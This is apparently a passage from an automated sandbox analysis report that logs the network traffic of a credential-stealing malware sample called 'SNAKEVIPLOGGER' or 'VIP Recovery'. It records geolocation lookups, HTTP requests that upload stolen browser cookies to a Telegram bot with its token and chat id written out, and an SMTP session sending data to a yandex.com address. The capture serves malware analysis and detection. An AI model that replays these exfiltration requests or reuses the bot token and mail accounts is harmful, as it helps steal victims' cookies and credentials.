                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.549735149.154.167.2204435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:03 UTC376OUTPOST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcad0e9d9f0038
                                      Host: api.telegram.org
                                      Content-Length: 1257
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:03 UTC1257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 64 30 65 39 64 39 66 30 30 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 30 37 2f 32 30 32 34 20
                                      Data Ascii: --------------------------8dcad0e9d9f0038Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:124406Date and Time: 24/07/2024
                                      2024-07-25 01:35:04 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 25 Jul 2024 01:35:04 GMT
                                      Content-Type: application/json
                                      Content-Length: 546
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-07-25 01:35:04 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 33 39 35 36 34 36 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 42 4f 54 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 34 33 38 32 35 38 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 61 73 79 6d 6f 6e 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 64 70 73 70 61 6d 6d 69 6e 67 73 75 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 38 37 31 33 30 34 2c 22 64 6f
                                      Data Ascii: {"ok":true,"result":{"message_id":1651,"from":{"id":7339564661,"is_bot":true,"first_name":"SNAKEVIPLOGGER","username":"SNAKEVIPLOGGERBOT"},"chat":{"id":6443825857,"first_name":"Easymoni","username":"Rdpspammingsure","type":"private"},"date":1721871304,"do


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.549737188.114.97.34436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-25 01:35:25 UTC701INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:25 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 48
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Kxv%2Fhd54YOfymWeTes2ZHy6pR02LedpaKLA8cb3ULQnS6NznWbXnbT8CGgbEqeHzhRp4WcjuLG2NaijWwmkaG7ZsxsWph12FoQOeeJBRydZh%2BPWJN7HA52AcAA6aD6QqLmSBCBX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869c98f8b0f4d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.549739188.114.97.34436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:26 UTC709INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:26 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 49
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GQuUk6C4vxGhOTWsQMhiHGlZxqYu1aKTTEEcQWUxnfxqcUZVyl9ht3%2FvJ2ijCpLmlSA%2BZ%2BfeOY9%2Fi4DEX%2BRgvEe6O1xdUamo8SlSOlxqaJSqdWSqqDrjHo2lcBrZs%2BAOZYoIJ1nI"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869d15a51c3eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.549741188.114.97.34436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:28 UTC707INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:28 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 51
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O92Gbm46CR6eiSKOkVjQBRZtwMoL4u10bFQ2ClSQs8UvEyXqcP%2FjPS%2FrcqJ8o%2B1nInB%2F3RZZ32kIj4fbWvgQf5zjxUXty8pIxfVkjCV7%2Fmf5WtMa5p1xWy5c7HTu4danOAsnNMdX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869d94f0a4269-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.549744188.114.97.34436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:29 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:29 UTC707INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:29 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 52
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXEaC32z4KcBqpBcFuZXUu6kaNVC%2FBUYsXBUTf%2FO1mfI8mzRE1M1IivMOxhy86oMDtageNok0Dxi7nV%2FlgcQeZ8qGLfEwylNiOvW%2FORa%2BTmmkaOeLtcmEpABb0mYktMc1OzHM2mW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869e13d6c0c76-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.549746188.114.97.34436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:30 UTC705INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:30 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 53
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnIp82%2Bfh5KJ9fGK7w205gHDXfk%2FyqKBra7yS3TTJOycs8fflhbb5YsrWg3spwA%2BJdk6QX2WqgW5JTM24PJHMkmT68OAfATyg53SjUW%2FienbDA8VlONfbf2pOMQHZGvCHkcRmqQB"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869e94d596a50-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.549748188.114.97.34436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:32 UTC705INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:32 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 55
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sgEfkPWW7wLK52DCv71JPC4f7mzaG7n%2F%2BxIszHB4H7hLifuAXsAtKLqef%2FXNA338x4T%2BqKbdKcoi4uP6QEUgIS83iXN3qJuPrkY2fSpJlDKgzy6QD70gVLYsOwu5k3ZtYch3QYPZ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869f13b135e67-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.549749149.154.167.2204436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:32 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                      Host: api.telegram.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:33 UTC344INHTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Date: Thu, 25 Jul 2024 01:35:32 GMT
                                      Content-Type: application/json
                                      Content-Length: 55
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-07-25 01:35:33 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.549751149.154.167.2204436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:50 UTC376OUTPOST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcae9abfa21153
                                      Host: api.telegram.org
                                      Content-Length: 1257
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:50 UTC1257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 65 39 61 62 66 61 32 31 31 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 30 37 2f 32 30 32 34 20
                                      Data Ascii: --------------------------8dcae9abfa21153Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:124406Date and Time: 24/07/2024
                                      2024-07-25 01:35:50 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 25 Jul 2024 01:35:50 GMT
                                      Content-Type: application/json
                                      Content-Length: 546
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-07-25 01:35:50 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 33 39 35 36 34 36 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 42 4f 54 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 34 33 38 32 35 38 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 61 73 79 6d 6f 6e 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 64 70 73 70 61 6d 6d 69 6e 67 73 75 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 38 37 31 33 35 30 2c 22 64 6f
                                      Data Ascii: {"ok":true,"result":{"message_id":1652,"from":{"id":7339564661,"is_bot":true,"first_name":"SNAKEVIPLOGGER","username":"SNAKEVIPLOGGERBOT"},"chat":{"id":6443825857,"first_name":"Easymoni","username":"Rdpspammingsure","type":"private"},"date":1721871350,"do


                                      SMTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Jul 25, 2024 03:34:56.707880020 CEST58749734118.69.190.131192.168.2.5220 isphost2.fptdata.vn ESMTP Exim 4.94 Thu, 25 Jul 2024 08:34:56 +0700
                                      Jul 25, 2024 03:34:56.710510015 CEST49734587192.168.2.5118.69.190.131EHLO 124406
                                      Jul 25, 2024 03:34:57.057641029 CEST58749734118.69.190.131192.168.2.5250-isphost2.fptdata.vn Hello 124406 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-X_PIPE_CONNECT
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Jul 25, 2024 03:34:57.059765100 CEST49734587192.168.2.5118.69.190.131AUTH login c2FsZXMtbmd1eWVuQHZ2dHJhZGUudm4=
                                      Jul 25, 2024 03:34:57.406399965 CEST58749734118.69.190.131192.168.2.5334 UGFzc3dvcmQ6
                                      Jul 25, 2024 03:34:57.776628017 CEST58749734118.69.190.131192.168.2.5235 Authentication succeeded
                                      Jul 25, 2024 03:34:57.778599977 CEST49734587192.168.2.5118.69.190.131MAIL FROM:<sales-nguyen@vvtrade.vn>
                                      Jul 25, 2024 03:34:58.125503063 CEST58749734118.69.190.131192.168.2.5250 OK
                                      Jul 25, 2024 03:34:58.125696898 CEST49734587192.168.2.5118.69.190.131RCPT TO:<saleseuropower@yandex.com>
                                      Jul 25, 2024 03:34:59.240441084 CEST58749734118.69.190.131192.168.2.5250 Accepted
                                      Jul 25, 2024 03:34:59.240458012 CEST58749734118.69.190.131192.168.2.5250 Accepted
                                      Jul 25, 2024 03:34:59.240688086 CEST49734587192.168.2.5118.69.190.131DATA
